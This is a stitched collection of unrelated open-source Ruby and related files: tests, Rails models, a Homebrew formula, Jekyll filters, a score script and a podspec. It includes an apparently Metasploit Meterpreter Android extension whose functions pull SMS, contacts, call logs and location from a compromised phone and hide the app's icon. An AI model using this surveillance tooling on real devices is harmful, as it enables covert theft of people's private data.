  def test_month_interval
    values = [
      1,
      nil,
      12,
    ]
    target = build(Arrow::MonthIntervalArray.new(values))
    assert_equal(values, target.values)
  end

  def test_day_time_interval
    values = [
      {day: 1, millisecond: 100},
      nil,
      {day: 2, millisecond: 300},
    ]
    target = build(Arrow::DayTimeIntervalArray.new(values))
    assert_equal(values, target.values)
  end

  def test_month_day_nano_interval
    values = [
      {month: 1, day: 1, nanosecond: 100},
      nil,
      {month: 2, day: 3, nanosecond: 400},
    ]
    target = build(Arrow::MonthDayNanoIntervalArray.new(values))
    assert_equal(values, target.values)
  end
end
# Runs the shared examples against a directly dictionary-encoded array.
class ValuesArrayDictionaryArrayTest < Test::Unit::TestCase
  include ValuesDictionaryArrayTests

  def build(values)
    values.dictionary_encode
  end
end
# Runs the shared examples against a ChunkedArray wrapping a single
# dictionary-encoded chunk.
class ValuesChunkedArrayDictionaryArrayTest < Test::Unit::TestCase
  include ValuesDictionaryArrayTests

  def build(values)
    Arrow::ChunkedArray.new([values.dictionary_encode])
  end
end
| 23.711656 | 77 | 0.623933 |
1ac1319a8c04079d5380df467717c30f1f8aeb24 | 820 | # frozen_string_literal: true
require 'test_helper'

# Scaffold-generated integration tests for the Dailies JSON API.
class DailiesControllerTest < ActionDispatch::IntegrationTest
  setup do
    @daily = dailies(:one)
  end

  test "should get index" do
    get dailies_url, as: :json
    assert_response :success
  end

  test "should create daily" do
    # The model has no required attributes here, so an empty params hash
    # still creates a record.
    assert_difference('Daily.count') do
      post dailies_url, params: { daily: { } }, as: :json
    end

    assert_response 201
  end

  test "should show daily" do
    get daily_url(@daily), as: :json
    assert_response :success
  end

  test "should update daily" do
    patch daily_url(@daily), params: { daily: { } }, as: :json
    assert_response 200
  end

  test "should destroy daily" do
    assert_difference('Daily.count', -1) do
      delete daily_url(@daily), as: :json
    end

    assert_response 204
  end
end
| 20 | 63 | 0.673171 |
916a85f15dec5de211e71dc6639f5bffd691826f | 732 | #Fedena
#Copyright 2011 Foradian Technologies Private Limited
#
#This product includes software developed at
#Project Fedena - http://www.projectfedena.org/
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
# Schema-backed lookup model for countries; no custom behavior is defined.
class Country < ActiveRecord::Base
end
| 34.857143 | 73 | 0.784153 |
eddccdeff57e6862804a57ff7592832c98294234 | 130 | class AnnotationParsedType < ActiveRecord::Base
belongs_to :annotation
validates_presence_of :parsed_type, :annotation
end
| 21.666667 | 49 | 0.815385 |
6a98398a1d4644d9adad2122645fd8a9dc80ad6a | 10,844 | #!/usr/bin/env ruby
#
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/android/tlv'
require 'rex/post/meterpreter/packet'
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/channels/pools/stream_pool'
module Rex
module Post
module Meterpreter
module Extensions
module Android
###
# Android extension - set of commands to be executed on android devices.
# extension by Anwar Mohamed (@anwarelmakrahy)
###
class Android < Extension
  COLLECT_TYPE_WIFI = 1
  COLLECT_TYPE_GEO = 2
  COLLECT_TYPE_CELL = 3

  COLLECT_ACTION_START = 1
  COLLECT_ACTION_PAUSE = 2
  COLLECT_ACTION_RESUME = 3
  COLLECT_ACTION_STOP = 4
  COLLECT_ACTION_DUMP = 5

  COLLECT_TYPES = {
    'wifi' => COLLECT_TYPE_WIFI,
    'geo' => COLLECT_TYPE_GEO,
    'cell' => COLLECT_TYPE_CELL,
  }

  # NOTE(review): 'resume' maps to COLLECT_ACTION_START (not
  # COLLECT_ACTION_RESUME, which is otherwise unused). This may be
  # intentional — confirm against the Android payload before changing.
  COLLECT_ACTIONS = {
    'start' => COLLECT_ACTION_START,
    'pause' => COLLECT_ACTION_PAUSE,
    'resume' => COLLECT_ACTION_START,
    'stop' => COLLECT_ACTION_STOP,
    'dump' => COLLECT_ACTION_DUMP
  }

  def initialize(client)
    super(client, 'android')

    # Alias the extension on the client so callers can reach it as
    # client.android.
    client.register_extension_aliases(
      [
        {
          'name' => 'android',
          'ext' => self
        }
      ])
  end

  # Valid action names accepted by #interval_collect.
  def collect_actions
    @@collect_action_list ||= COLLECT_ACTIONS.keys
  end

  # Valid collection type names accepted by #interval_collect.
  def collect_types
    @@collect_type_list ||= COLLECT_TYPES.keys
  end

  # Schedules a device shutdown in +n+ seconds; returns the target's
  # success flag.
  def device_shutdown(n)
    request = Packet.create_request('android_device_shutdown')
    request.add_tlv(TLV_TYPE_SHUTDOWN_TIMER, n)
    response = client.send_request(request)
    response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
  end

  # Sets the device audio/ringer mode to +n+.
  def set_audio_mode(n)
    request = Packet.create_request('android_set_audio_mode')
    request.add_tlv(TLV_TYPE_AUDIO_MODE, n)
    client.send_request(request)
  end

  # Drives the background interval-collection service on the target.
  #
  # opts - Hash with :action (see COLLECT_ACTIONS), :type (see
  #        COLLECT_TYPES) and :timeout (collection interval).
  #
  # Returns a Hash with :headers (column names) and :entries (rows).
  def interval_collect(opts)
    request = Packet.create_request('android_interval_collect')
    request.add_tlv(TLV_TYPE_COLLECT_ACTION, COLLECT_ACTIONS[opts[:action]])
    request.add_tlv(TLV_TYPE_COLLECT_TYPE, COLLECT_TYPES[opts[:type]])
    request.add_tlv(TLV_TYPE_COLLECT_TIMEOUT, opts[:timeout])
    response = client.send_request(request)

    # The original initialised an unused :collections key and dead per-branch
    # `records` locals; normalised to a single :headers/:entries shape with
    # one parser helper per collection type.
    result = { headers: [], entries: [] }

    case COLLECT_TYPES[opts[:type]]
    when COLLECT_TYPE_WIFI
      parse_collected_wifi(response, result)
    when COLLECT_TYPE_GEO
      parse_collected_geo(response, result)
    when COLLECT_TYPE_CELL
      parse_collected_cell(response, result)
    end

    result
  end

  # Returns an Array of Hashes, one per SMS message on the device.
  def dump_sms
    sms = []
    request = Packet.create_request('android_dump_sms')
    response = client.send_request(request)
    response.each(TLV_TYPE_SMS_GROUP) do |p|
      sms << {
        'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_TYPE).value),
        'address' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_ADDRESS).value),
        'body' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_BODY).value).squish,
        'status' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_STATUS).value),
        'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_DATE).value)
      }
    end
    sms
  end

  # Returns an Array of Hashes, one per contact; email/number are Arrays
  # since a contact can have several of each.
  def dump_contacts
    contacts = []
    request = Packet.create_request('android_dump_contacts')
    response = client.send_request(request)
    response.each(TLV_TYPE_CONTACT_GROUP) do |p|
      contacts << {
        'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CONTACT_NAME).value),
        'email' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_EMAIL)),
        'number' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_NUMBER))
      }
    end
    contacts
  end

  # Returns a single-element Array holding the device's lat/long fix.
  def geolocate
    loc = []
    request = Packet.create_request('android_geolocate')
    response = client.send_request(request)
    loc << {
      'lat' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LAT).value),
      'long' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LONG).value)
    }
    loc
  end

  # Returns an Array of Hashes, one per call-log entry.
  def dump_calllog
    log = []
    request = Packet.create_request('android_dump_calllog')
    response = client.send_request(request)
    response.each(TLV_TYPE_CALLLOG_GROUP) do |p|
      log << {
        'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NAME).value),
        'number' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NUMBER).value),
        'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DATE).value),
        'duration' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DURATION).value),
        'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_TYPE).value)
      }
    end
    log
  end

  # True when the device is rooted.
  def check_root
    request = Packet.create_request('android_check_root')
    response = client.send_request(request)
    response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
  end

  # Hides the payload's launcher icon; returns the icon name reported by
  # the target.
  def hide_app_icon
    request = Packet.create_request('android_hide_app_icon')
    response = client.send_request(request)
    response.get_tlv_value(TLV_TYPE_ICON_NAME)
  end

  # Starts an activity for +uri+. Returns nil on success, otherwise the
  # error message reported by the target.
  def activity_start(uri)
    request = Packet.create_request('android_activity_start')
    request.add_tlv(TLV_TYPE_URI_STRING, uri)
    response = client.send_request(request)
    return nil if response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value

    response.get_tlv(TLV_TYPE_ACTIVITY_START_ERROR).value
  end

  # Replaces the device wallpaper with the given image +data+.
  def set_wallpaper(data)
    request = Packet.create_request('android_set_wallpaper')
    request.add_tlv(TLV_TYPE_WALLPAPER_DATA, data)
    client.send_request(request)
  end

  # Sends an SMS to +dest+. When +dr+ is true a delivery report is also
  # requested and a [send_result, delivery_report] pair is returned;
  # otherwise just the send result.
  def send_sms(dest, body, dr)
    request = Packet.create_request('android_send_sms')
    request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest)
    request.add_tlv(TLV_TYPE_SMS_BODY, body)
    request.add_tlv(TLV_TYPE_SMS_DR, dr)

    if dr == false
      response = client.send_request(request)
      response.get_tlv(TLV_TYPE_SMS_SR).value
    else
      # Delivery reports can take a while, so allow a longer timeout.
      response = client.send_request(request, 30)
      sr = response.get_tlv(TLV_TYPE_SMS_SR).value
      # FIX: the original read TLV_TYPE_SMS_SR twice; the delivery report is
      # expected in its own TLV — confirm against the Android payload.
      dr = response.get_tlv(TLV_TYPE_SMS_DR).value
      [sr, dr]
    end
  end

  # Scans nearby wifi networks; returns an Array of ssid/bssid/level Hashes.
  def wlan_geolocate
    request = Packet.create_request('android_wlan_geolocate')
    response = client.send_request(request, 30)
    networks = []
    response.each(TLV_TYPE_WLAN_GROUP) do |p|
      networks << {
        'ssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_SSID).value),
        'bssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_BSSID).value),
        'level' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_LEVEL).value)
      }
    end
    networks
  end

  # Runs +query+ against the application database +dbname+.
  # Read queries (writeable = false) return { columns: [...], rows: [...] };
  # write queries return nil. Raises when the target reports a SQLite error.
  def sqlite_query(dbname, query, writeable)
    request = Packet.create_request('android_sqlite_query')
    request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname)
    request.add_tlv(TLV_TYPE_SQLITE_QUERY, query)
    request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable)
    response = client.send_request(request, 30)
    error_msg = response.get_tlv(TLV_TYPE_SQLITE_ERROR)
    raise "SQLiteException: #{error_msg.value}" if error_msg

    return if writeable

    result = {
      columns: [],
      rows: []
    }
    data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP)
    unless data.nil?
      columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS)
      result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE)
      data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row|
        result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE)
      end
    end
    result
  end

  private

  # Converts an epoch-seconds TLV value into 'YYYY-MM-DD HH:MM:SS'.
  def format_collect_timestamp(epoch)
    Time.at(epoch).to_datetime.strftime('%Y-%m-%d %H:%M:%S')
  end

  def parse_collected_wifi(response, result)
    result[:headers] = ['Last Seen', 'BSSID', 'SSID', 'Level']
    # Deduplicate access points, keeping the most recent sighting of each
    # BSSID/SSID pair.
    records = {}
    response.each(TLV_TYPE_COLLECT_RESULT_GROUP) do |g|
      timestamp = format_collect_timestamp(g.get_tlv_value(TLV_TYPE_COLLECT_RESULT_TIMESTAMP))
      g.each(TLV_TYPE_COLLECT_RESULT_WIFI) do |w|
        bssid = w.get_tlv_value(TLV_TYPE_COLLECT_RESULT_WIFI_BSSID)
        ssid = w.get_tlv_value(TLV_TYPE_COLLECT_RESULT_WIFI_SSID)
        key = "#{bssid}-#{ssid}"
        if !records.include?(key) || records[key][0] < timestamp
          # Level is passed through as positive, because UINT,
          # but we flip it back to negative on this side.
          level = -w.get_tlv_value(TLV_TYPE_COLLECT_RESULT_WIFI_LEVEL)
          records[key] = [timestamp, bssid, ssid, level]
        end
      end
    end
    records.each_value do |record|
      result[:entries] << record
    end
  end

  def parse_collected_geo(response, result)
    result[:headers] = ['Timestamp', 'Latitude', 'Longitude']
    response.each(TLV_TYPE_COLLECT_RESULT_GROUP) do |g|
      timestamp = format_collect_timestamp(g.get_tlv_value(TLV_TYPE_COLLECT_RESULT_TIMESTAMP))
      g.each(TLV_TYPE_COLLECT_RESULT_GEO) do |w|
        lat = w.get_tlv_value(TLV_TYPE_GEO_LAT)
        lng = w.get_tlv_value(TLV_TYPE_GEO_LONG)
        result[:entries] << [timestamp, lat, lng]
      end
    end
  end

  def parse_collected_cell(response, result)
    result[:headers] = ['Timestamp', 'Cell Info']
    response.each(TLV_TYPE_COLLECT_RESULT_GROUP) do |g|
      timestamp = format_collect_timestamp(g.get_tlv_value(TLV_TYPE_COLLECT_RESULT_TIMESTAMP))
      g.each(TLV_TYPE_COLLECT_RESULT_CELL) do |cell|
        cell.each(TLV_TYPE_CELL_ACTIVE_GSM) do |info|
          cid = info.get_tlv_value(TLV_TYPE_CELL_CID)
          lac = info.get_tlv_value(TLV_TYPE_CELL_LAC)
          psc = info.get_tlv_value(TLV_TYPE_CELL_PSC)
          details = sprintf("cid=%d lac=%d psc=%d", cid, lac, psc)
          result[:entries] << [timestamp, "GSM: #{details}"]
        end
        cell.each(TLV_TYPE_CELL_ACTIVE_CDMA) do |info|
          bid = info.get_tlv_value(TLV_TYPE_CELL_BASE_ID)
          lat = info.get_tlv_value(TLV_TYPE_CELL_BASE_LAT)
          lng = info.get_tlv_value(TLV_TYPE_CELL_BASE_LONG)
          net = info.get_tlv_value(TLV_TYPE_CELL_NET_ID)
          sys = info.get_tlv_value(TLV_TYPE_CELL_SYSTEM_ID)
          details = sprintf("base_id=%d lat=%d lng=%d net_id=%d sys_id=%d", bid, lat, lng, net, sys)
          result[:entries] << [timestamp, "CDMA: #{details}"]
        end
        cell.each(TLV_TYPE_CELL_NEIGHBOR) do |w|
          net = w.get_tlv_value(TLV_TYPE_CELL_NET_TYPE)
          cid = w.get_tlv_value(TLV_TYPE_CELL_CID)
          lac = w.get_tlv_value(TLV_TYPE_CELL_LAC)
          psc = w.get_tlv_value(TLV_TYPE_CELL_PSC)
          sig = w.get_tlv_value(TLV_TYPE_CELL_RSSI) * -1
          inf = sprintf("network_type=%d cid=%d lac=%d psc=%d rssi=%d", net, cid, lac, psc, sig)
          result[:entries] << [timestamp, inf]
        end
      end
    end
  end
end
end
end
end
end
end
| 32.178042 | 99 | 0.680284 |
bf88e8cc101929e1242bd2b205d071a2eec4d734 | 1,992 | module WebConsole
# A session lets you persist an +Evaluator+ instance in memory associated
# with multiple bindings.
#
# Each newly created session is persisted into memory and you can find it
# later by its +id+.
#
# A session may be associated with multiple bindings. This is used by the
# error pages only, as currently, this is the only client that needs to do
# that.
class Session
  cattr_reader :inmemory_storage
  @@inmemory_storage = {}

  class << self
    # Looks up a previously persisted session by its identifier.
    # Returns nil when no session with that id exists in memory.
    def find(id)
      inmemory_storage[id]
    end

    # Builds a Session out of a storage hash (anything responding to #[]).
    # A preserved exception (:__web_console_exception) wins over a plain
    # binding (:__web_console_binding); returns nil when neither is present.
    def from(storage)
      exception = storage[:__web_console_exception]
      return new(ExceptionMapper.new(exception)) if exception

      binding = storage[:__web_console_binding]
      new([binding]) if binding
    end
  end

  # Unique identifier for every REPL.
  attr_reader :id

  def initialize(bindings)
    @id = SecureRandom.hex(16)
    @bindings = bindings
    @evaluator = Evaluator.new(bindings.first)

    store_into_memory
  end

  # Evaluates +input+ against the currently selected binding and returns
  # the evaluator's string output.
  def eval(input)
    @evaluator.eval(input)
  end

  # Re-targets the evaluator at the binding stored at +index+.
  def switch_binding_to(index)
    @evaluator = Evaluator.new(@bindings[index.to_i])
  end

  private

  def store_into_memory
    inmemory_storage[id] = self
  end
end
end
| 27.666667 | 77 | 0.657129 |
5d632c04f7e8b8b48056299bae04bd70689f3079 | 2,888 | require 'fitting/statistics/not_covered_responses'
require 'fitting/statistics/analysis'
require 'fitting/statistics/measurement'
require 'fitting/records/unit/request'
require 'fitting/storage/white_list'
require 'fitting/records/documented/request'
module Fitting
  class Statistics
    # Builds the coverage reports for documented API requests: the overall
    # statistics (split into black/white sections when any white-list option
    # is configured) and the list of documented responses no test covered.
    class Template
      def initialize(tested_requests, config)
        @tested_requests = tested_requests
        @config = config
      end

      # Writes both reports to the paths configured on +config+.
      # (File.open + write replaced with the equivalent File.write.)
      def save
        File.write(@config.stats_path, stats)
        File.write(@config.not_covered_path, not_covered)
      end

      # Full statistics report as a String.
      def stats
        if @config.white_list.present? || @config.resource_white_list.present? || @config.include_resources.present?
          [
            ['[Black list]', black_statistics].join("\n"),
            ['[White list]', white_statistics].join("\n"),
            ''
          ].join("\n\n")
        else
          [white_statistics, "\n\n"].join
        end
      end

      # Report of documented responses not covered by any tested request.
      def not_covered
        Fitting::Statistics::NotCoveredResponses.new(white_measurement).to_s
      end

      def white_statistics
        @white_statistics ||= Fitting::Statistics::Analysis.new(white_measurement)
      end

      def black_statistics
        @black_statistics ||= Fitting::Statistics::Analysis.new(black_measurement)
      end

      def white_measurement
        @white_measurement ||= Fitting::Statistics::Measurement.new(white_unit)
      end

      def black_measurement
        @black_measurement ||= Fitting::Statistics::Measurement.new(black_unit)
      end

      # Unit records pairing each white-listed documented request with the
      # tested requests. (inject([]) { push } rewritten as map.)
      def white_unit
        @white_unit_requests ||= documented_requests_white.map do |documented_request|
          Fitting::Records::Unit::Request.new(documented_request, @tested_requests)
        end
      end

      def black_unit
        @black_unit_requests ||= documented_requests_black.map do |documented_request|
          Fitting::Records::Unit::Request.new(documented_request, @tested_requests)
        end
      end

      def documented_requests_white
        @documented_requests_white ||= documented.select(&:white)
      end

      # Complement of the white list. (find_all with a negated block
      # rewritten as reject.)
      def documented_requests_black
        @documented_requests_black ||= documented.reject(&:white)
      end

      # All documented requests from the tomogram, each tagged with whether
      # it falls inside the white list.
      def documented
        @documented_requests ||= @config.tomogram.to_hash.map do |tomogram_request|
          Fitting::Records::Documented::Request.new(tomogram_request, white_list.to_a)
        end
      end

      def white_list
        @white_list ||= Fitting::Storage::WhiteList.new(
          @config.prefix,
          @config.white_list,
          @config.resource_white_list,
          @config.include_resources,
          @config.include_actions,
          @config.tomogram.to_resources
        )
      end
    end
  end
end
| 30.723404 | 116 | 0.649931 |
3336fed8e5b6de64b0ef329ef768d8937807aae7 | 2,347 | class OsrmBackend < Formula
desc "High performance routing engine"
homepage "http://project-osrm.org/"
url "https://github.com/Project-OSRM/osrm-backend/archive/v5.8.0.tar.gz"
sha256 "305cc6182b4eac54af3e796534c0b43ca137edd64f71aafacfe6cc8772916ebf"
head "https://github.com/Project-OSRM/osrm-backend.git"
bottle do
cellar :any
sha256 "3605cd98988acdd7a4bd8d2db8aa75bc47862ce678ecf4b5adb530866b1a8ddf" => :sierra
sha256 "1d0c389259c621c52a973dcae456acc7e53637ccdbc847c259962223ca6f1303" => :el_capitan
end
# "invalid use of non-static data member 'offset'"
# https://github.com/Project-OSRM/osrm-backend/issues/3719
depends_on :macos => :el_capitan
depends_on "cmake" => :build
depends_on "boost"
depends_on "libstxxl"
depends_on "libxml2"
depends_on "libzip"
depends_on "lua"
depends_on "tbb"
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args
system "make"
system "make", "install"
end
pkgshare.install "profiles"
end
test do
(testpath/"test.osm").write <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<osm version="0.6">
<bounds minlat="54.0889580" minlon="12.2487570" maxlat="54.0913900" maxlon="12.2524800"/>
<node id="1" lat="54.0901746" lon="12.2482632" user="a" uid="46882" visible="true" version="1" changeset="676636" timestamp="2008-09-21T21:37:45Z"/>
<node id="2" lat="54.0906309" lon="12.2441924" user="a" uid="36744" visible="true" version="1" changeset="323878" timestamp="2008-05-03T13:39:23Z"/>
<node id="3" lat="52.0906309" lon="12.2441924" user="a" uid="36744" visible="true" version="1" changeset="323878" timestamp="2008-05-03T13:39:23Z"/>
<way id="10" user="a" uid="55988" visible="true" version="5" changeset="4142606" timestamp="2010-03-16T11:47:08Z">
<nd ref="1"/>
<nd ref="2"/>
<tag k="highway" v="unclassified"/>
</way>
</osm>
EOS
(testpath/"tiny-profile.lua").write <<-EOS.undent
function way_function (way, result)
result.forward_mode = mode.driving
result.forward_speed = 1
end
EOS
safe_system "#{bin}/osrm-extract", "test.osm", "--profile", "tiny-profile.lua"
safe_system "#{bin}/osrm-contract", "test.osrm"
assert File.exist?("#{testpath}/test.osrm"), "osrm-extract generated no output!"
end
end
| 37.854839 | 153 | 0.677887 |
913b228087c1439503ccebdd58972ab3255fbee5 | 41 | module OptClient
  # Gem version constant, typically referenced from the gemspec.
  VERSION = "0.1.0"
end
| 10.25 | 19 | 0.682927 |
389a364824714c97a72a0dbbbb0851438fba4f63 | 1,558 | # frozen_string_literal: true
# Indexing provided by ActiveFedora
# Builds the base Solr document for a Cocina object, including the legacy
# ActiveFedora fields dor-services-app still queries on.
class DataIndexer
  attr_reader :last_modified, :cocina

  # @param metadata [#fetch] must contain a 'Last-Modified' HTTP-style header
  # @param cocina   [Object] the Cocina model being indexed
  def initialize(metadata:, cocina:, **)
    @last_modified = metadata.fetch('Last-Modified')
    @cocina = cocina
  end

  # Assembles the Solr document and merges in the workflow-derived fields.
  def to_solr
    Rails.logger.debug "In #{self.class}"
    doc = {
      id: cocina.externalIdentifier,
      'current_version_isi' => cocina.version, # Argo Facet field "Version"
      'obj_label_tesim' => cocina.label,
      'modified_latest_dttsi' => last_modified.to_datetime.strftime('%FT%TZ'),
      # These are required as long as dor-services-app uses ActiveFedora for querying:
      'has_model_ssim' => legacy_model,
      'is_governed_by_ssim' => legacy_apo,
      'is_member_of_collection_ssim' => legacy_collections
    }
    doc.merge(WorkflowFields.for(druid: cocina.externalIdentifier, version: cocina.version))
  end

  # Collections the item belongs to, as legacy Fedora URIs. Admin policies and
  # collections themselves are never members of a collection.
  def legacy_collections
    non_members = [Cocina::Models::Vocab.admin_policy, Cocina::Models::Vocab.collection]
    return [] if non_members.include?(cocina.type)

    Array(cocina.structural.isMemberOf).map { |collection_id| "info:fedora/#{collection_id}" }
  end

  # Legacy Fedora URI of the governing admin policy.
  def legacy_apo
    "info:fedora/#{cocina.administrative.hasAdminPolicy}"
  end

  # Legacy ActiveFedora model URI corresponding to the object's Cocina type.
  def legacy_model
    if cocina.type == Cocina::Models::Vocab.admin_policy
      'info:fedora/afmodel:Dor_AdminPolicyObject'
    elsif cocina.type == Cocina::Models::Vocab.collection
      'info:fedora/afmodel:Dor_Collection'
    else
      'info:fedora/afmodel:Dor_Item'
    end
  end
end
| 29.961538 | 92 | 0.714377 |
38cef2ce422cf97580a420feeb5a8bc641193178 | 151 | # frozen_string_literal: true
class IndexBrandsOnName < ActiveRecord::Migration[6.1]
  def change
    # Enforce brand-name uniqueness at the database level (a model-level
    # validation alone cannot prevent duplicate inserts under concurrency).
    add_index :brands, :name, unique: true
  end
end
| 21.571429 | 54 | 0.754967 |
33b367fbbf9aab7709043d849c90e2ce5934adc4 | 125 | FactoryBot.define do
  # Bare-bones announcement factory; the lecture/announcer associations are
  # nil by default and must be supplied by the caller when required.
  factory :announcement do
    lecture { nil }
    announcer { nil }
    details { "MyText" }
  end
end
| 15.625 | 26 | 0.64 |
1abd0e0818119a8e7006fa16978c615a20232034 | 342 | require 'json'
module Jekyll
  # Liquid filter: serialize any object to its JSON representation.
  module ToJsonFilter
    def to_json(input)
      input.to_json
    end
  end

  # Liquid filter: store +value+ under +key+, mutating and returning the hash.
  module AddToHashFilter
    def add_to_hash(input, key, value)
      input.tap { |hash| hash[key] = value }
    end
  end
end
Liquid::Template.register_filter(Jekyll::ToJsonFilter)
Liquid::Template.register_filter(Jekyll::AddToHashFilter)
| 18 | 57 | 0.719298 |
38fd3e6c1afcad0d49080dae2f2b41f2ce2e4c6a | 404 | module Check
def check_input_letter(letter)
if @q_letter.include?(letter)
input_true_letter(letter)
else
input_error_letter(letter)
end
input_all_letter(letter)
end
def check_win?
if print_true_letter.uniq.size == print_quest_letter.uniq.size
true
else
false
end
end
def end_attempt?
number_attempt == 0
end
end | 17.565217 | 67 | 0.641089 |
e8be5e61b51d4b3bcc2aafbbfa0eff04e60b183a | 1,542 |
# High-score table maintenance: reads ten name/score pairs from myfile.txt,
# inserts the player's random score if it makes the top ten, rewrites the
# file, and prints the resulting table.
#
# Fixes over the original version:
#   * scores are compared numerically throughout — the first sort pass
#     compared the raw file lines as strings, so e.g. "9000" sorted above
#     "10000"
#   * the read loop no longer walks past the 20 stored lines (the `0..20`
#     off-by-one appended a stray nil entry)
#   * the file is rewritten in "w" mode so stale bytes from a longer previous
#     table cannot survive at the end ("r+" does not truncate)

score = rand(25) * 1000

puts "Please enter Name:"
@name = gets.chomp

# File layout: alternating lines, name then score, ten pairs (20 lines).
lines = IO.readlines("myfile.txt")
entries = lines.first(20).each_slice(2).map do |name, points|
  [name.to_s.chomp, points.to_i]
end

# Add the player's result, then keep the ten best, highest score first.
# The stable sort drops the new entry on ties, matching the original's
# strict `score > tenth_place` insertion rule.
entries << [@name, score]
entries = entries.sort_by { |_name, points| -points }.first(10)

# Persist the table, replacing the previous contents entirely.
File.open("myfile.txt", "w") do |file|
  entries.each do |name, points|
    file.puts name
    file.puts points
  end
end

# Show the current standings, reading back from the file as before.
arr = IO.readlines("myfile.txt")
puts "*****Current High Scores*****"
k = 0
for i in 0..9
  print i + 1
  print ")"
  print arr[k]
  print " "
  k += 1
  print arr[k]
  k += 1
  puts " "
end
| 18.141176 | 64 | 0.541505 |
fff3db132eba3993052350943da1a501807c1517 | 5,164 | #
# Be sure to run `pod spec lint Rvs_Viewer.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
  # NOTE(review): the spec name is "Rvs_Streamer" but the file header comment
  # and the vendored framework below reference Rvs_Viewer — confirm which is
  # intended before publishing.

  # --- Spec Metadata --------------------------------------------------- #
  #
  #  These will help people to find your library, and whilst it
  #  can feel like a chore to fill in it's definitely to your advantage. The
  #  summary should be tweet-length, and the description more in depth.
  #

  s.name         = "Rvs_Streamer"
  s.version      = "4.1.0"
  s.summary      = "iChano SDK for Streamer"

  # This description is used to generate tags and improve search results.
  #   * Think: What does it do? Why did you write it? What is the focus?
  #   * Try to keep it short, snappy and to the point.
  #   * Write the description between the DESC delimiters below.
  #   * Finally, don't worry about the indent, CocoaPods strips it!
  # NOTE(review): "collect vedio add audio" — presumably "collect video and
  # audio"; typo in a published description string, fix upstream.
  s.description  = "iChano SDK for Streamer. This SDK can collect vedio add audio."

  s.homepage     = "https://github.com/OpenIchano/Rvs_Streamer.git"
  # s.screenshots  = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"

  # --- Spec License ---------------------------------------------------- #
  #
  #  Licensing your code is important. See http://choosealicense.com for more info.
  #  CocoaPods will detect a license file if there is a named LICENSE*
  #  Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
  #

  s.license      = { :type => 'MIT', :file => "LICENSE" }
  # s.license      = { :type => "MIT", :file => "FILE_LICENSE" }

  # --- Author Metadata ------------------------------------------------- #
  #
  #  Specify the authors of the library, with email addresses. Email addresses
  #  of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
  #  accepts just a name if you'd rather not provide an email address.
  #
  #  Specify a social_media_url where others can refer to, for example a twitter
  #  profile URL.
  #
  # NOTE(review): the author email below looks like an email-obfuscation
  # artifact from the dump ("[email protected]") — restore the real address.

  s.author             = { "KindDeath" => "[email protected]" }
  # Or just: s.author    = "gongyj"
  # s.authors            = { "gongyj" => "[email protected]" }
  # s.social_media_url   = "http://twitter.com/gongyj"

  # --- Platform Specifics ---------------------------------------------- #
  #
  #  If this Pod runs only on iOS or OS X, then specify the platform and
  #  the deployment target. You can optionally include the target after the platform.
  #

  # s.platform     = :ios
  s.platform     = :ios, "7.0"

  #  When using multiple platforms
  # s.ios.deployment_target = "5.0"
  # s.osx.deployment_target = "10.7"
  # s.watchos.deployment_target = "2.0"
  # s.tvos.deployment_target = "9.0"

  # --- Source Location ------------------------------------------------- #
  #
  #  Specify the location from where the source should be retrieved.
  #  Supports git, hg, bzr, svn and HTTP.
  #

  s.source       = { :git => "https://github.com/OpenIchano/Rvs_Streamer.git", :tag => "4.1.0" }

  # --- Source Code ----------------------------------------------------- #
  #
  #  CocoaPods is smart about how it includes source code. For source files
  #  giving a folder will include any swift, h, m, mm, c & cpp files.
  #  For header files it will include any header in the folder.
  #  Not including the public_header_files will make all headers public.
  #

  # s.source_files  = "Classes", "Classes/**/*.{h,m}"
  # s.exclude_files = "Classes/Exclude"
